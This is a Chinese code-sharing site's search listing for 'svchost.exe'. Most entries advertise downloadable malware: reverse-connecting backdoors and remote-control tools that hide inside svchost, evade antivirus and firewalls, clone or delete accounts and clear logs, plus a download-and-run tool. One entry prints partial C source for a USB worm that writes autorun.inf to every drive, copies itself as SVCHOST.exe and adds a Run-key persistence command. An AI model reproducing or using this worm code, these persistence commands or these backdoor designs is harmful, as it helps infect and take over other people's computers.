Location:
Search - svchost.exe
Search list
Description: 用系统权限法清理dll木马,相信大家对Dll木马都是非常熟悉了。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理,这个家伙的隐蔽性非常强,它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去,让你找不到,即使找到了也难以清除,因为正常的进程正在调用它嘛。
Platform: |
Size: 4801 |
Author: wangtian |
Hits:
Description: 揭开SVCHOST.exe进程之谜
揭开SVCHOST.exe进程之谜-kick SVCHOST.exe process Mystery kick SVCHOST.exe process Mystery
Platform: |
Size: 2380 |
Author: fy |
Hits:
Description: 1.在C、D、E盘和c:\\windows\\system、c:\\windows中生成本体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\\windows\\system\\svchost.exe,使其开机自动运行
4.在C:\\windows\\system下生成隐蔽DLL文件
5.执行后具有相联复制能力
Platform: |
Size: 3916 |
Author: 王国栋 |
Hits:
Description: 代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的 创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
Platform: |
Size: 404919 |
Author: 吴建 |
Hits:
Description: 用纯WIN32 SOCKET实现得一个远程控制程序,使用svchost.exe程序启动
Platform: |
Size: 155497 |
Author: thx4sg |
Hits:
Description: 创建SvcHost.exe调用的服务原理与实践。
Platform: |
Size: 23211 |
Author: Arthur |
Hits:
Description: 替换由svchost.exe启动的某个系统服务,具体服务由全局变量 ServiceName 决定.
经测试,生成的DLL文件运行完全正常.
测试环境: Windows 2003 Server + Delphi 7.0
代码只实现了一个框架,没有任何实际动作,仅作为学习用.如果你使用本代码
进行了任何扩充和修改,希望您能将代码寄一份给我.
Platform: |
Size: 46604 |
Author: Alexander |
Hits:
Description: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \"Services\"=\"%SystemRoot%\\svchost.exe\"
Platform: |
Size: 47299 |
Author: 马琳 |
Hits:
Description: 一个使用svchost.exe去启动,平时不开端口,可以进行反连接的后门程序(和小榕的BITS是同一类型的后门).这里先要对bingle致万二分感谢,没有他开放的svchostdll的代码,就不会有这个后门的出现,后门中有三分一代码是bingle的代码,所以banner只会显示PortLess BackDoor这样字眼.除了有上面的特点外,还加入了相当部分的功能在这后门,加入的功能分别是:V1.1的功能1.检测克隆帐户2.清日志3.克隆帐户4.删除系统帐户(内建用户Guest,Administrator都能删除)5.枚举系统帐户6.http下载7.安装终端8.查看系统所有IP9.注销系统10.关系统电源11.重启12.关闭系统13.查看系统信息14.查看或修改终端端口V1.2增加功能15.端口到程序关联(fport)16.查进程(pslist)17.杀进程(pskill)18.查看服务信息19.停止服务20.启动服务21.配置服务启动值22.删除服务23.从正向连接的Shell中可以返回到[Syrinx]#状态继续使用后门提供的以上命令 -By default to the use of an activated normally not open ports can be connected to the anti-backdoor (and small Banyan BITS is the same type of back door). Bingle right here first to express my heartfelt gratitude, he did not open svchostdll code, there will be the emergence of this back door, the back door a third of a bingle code is the code, the banner will show PortLess BackDoor such wording. in addition to the above features, but also by adding a considerable part of the function of the back door, by adding the function are : 1 V1.1 function. Detection of two cloned account. three-log. Cloning account 4. removal system account (built-in user Guest, Administrator can delete) 5. Enumeration System account 6.http download 7. installing Terminal 8. View all IP9 system. cancellation System
Platform: |
Size: 80721 |
Author: 叶文 |
Hits:
Description: HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Services"="%SystemRoot%\svchost.exe"
Platform: |
Size: 47104 |
Author: |
Hits:
Description: 用系统权限法清理dll木马,相信大家对Dll木马都是非常熟悉了。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理,这个家伙的隐蔽性非常强,它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去,让你找不到,即使找到了也难以清除,因为正常的进程正在调用它嘛。-err
Platform: |
Size: 4096 |
Author: wangtian |
Hits:
Description: 揭开SVCHOST.exe进程之谜
揭开SVCHOST.exe进程之谜-kick SVCHOST.exe process Mystery kick SVCHOST.exe process Mystery
Platform: |
Size: 2048 |
Author: |
Hits:
Description: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.执行后具有相联复制能力
-1. In C, D, E and disk c: windowssystem, c: windows generated ontology files 2. C, D, E intraday file generated automatically 3. Registration c: windowssystemsvchost.exe, make it run automatically boot 4 . in the C: windowssystem generated hidden DLL file 5. implementation associated with the ability to copy
Platform: |
Size: 4096 |
Author: 王国栋 |
Hits:
Description: 代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的 创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
-err
Platform: |
Size: 404480 |
Author: 吴建 |
Hits:
Description: 用纯WIN32 SOCKET实现得一个远程控制程序,使用svchost.exe程序启动-Pure WIN32 SOCKET achieve for a remote-control programs, the use of svchost.exe proceedings
Platform: |
Size: 155648 |
Author: thx4sg |
Hits:
Description: 创建SvcHost.exe调用的服务原理与实践。-Create Svchost.exe service call Principles and Practice.
Platform: |
Size: 22528 |
Author: Arthur |
Hits:
Description: 替换由svchost.exe启动的某个系统服务,具体服务由全局变量 ServiceName 决定.
经测试,生成的DLL文件运行完全正常.
测试环境: Windows 2003 Server + Delphi 7.0
代码只实现了一个框架,没有任何实际动作,仅作为学习用.如果你使用本代码
进行了任何扩充和修改,希望您能将代码寄一份给我.
-Replaced by the svchost.exe to start a system service, specific services are provided by the global variable ServiceName decision. Have been tested to generate the DLL file to run a completely normal manner. Test environment: Windows 2003 Server+ Delphi 7.0 code to achieve only a framework, there is no actual movement, just as learning to use. If you use this code and modify any of the expansion, I hope you can send a code to me.
Platform: |
Size: 46080 |
Author: Alexander |
Hits:
Description: 一个windows服务,dll版本的,svchost.exe加载执行的源代码,代码中的cpp文件可以直接拿出来使用-A windows service, dll versions, svchost.exe to load the implementation of the source code cpp code files can be used directly out
Platform: |
Size: 614400 |
Author: kochoday |
Hits:
Description: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
本病毒到目前为止任何杀毒软件都无法将其查杀
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
函数:制造垃圾文件
1.可以用于病毒开机自启动的注册表位置:-/* SVCHOST.C */
/* SVCHOST.EXE*/
#define SVCHOST_NUM 6
#include<stdio.h>
#include<string.h>
char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"}
char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"}
char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"}
char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f"
int copy(char*infile,char*outfile)
{
FILE*input,*output
char temp
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input)
fwrite(&temp,1,1
Platform: |
Size: 7168 |
Author: 2626648 |
Hits:
Description: 插svchost.exe,穿墙无进程下载者。
支持Win9x,WinNT,Win2k,WinXP,Win2k3等~其他的没测试.基本上支持Windows A-Plug svchost.exe, no process of those who download through the wall. Support for Win9x, WinNT, Win2k, WinXP, Win2k3, etc. ~ the other did not test. Basically support the Windows ALL
Platform: |
Size: 10240 |
Author: jacks |
Hits: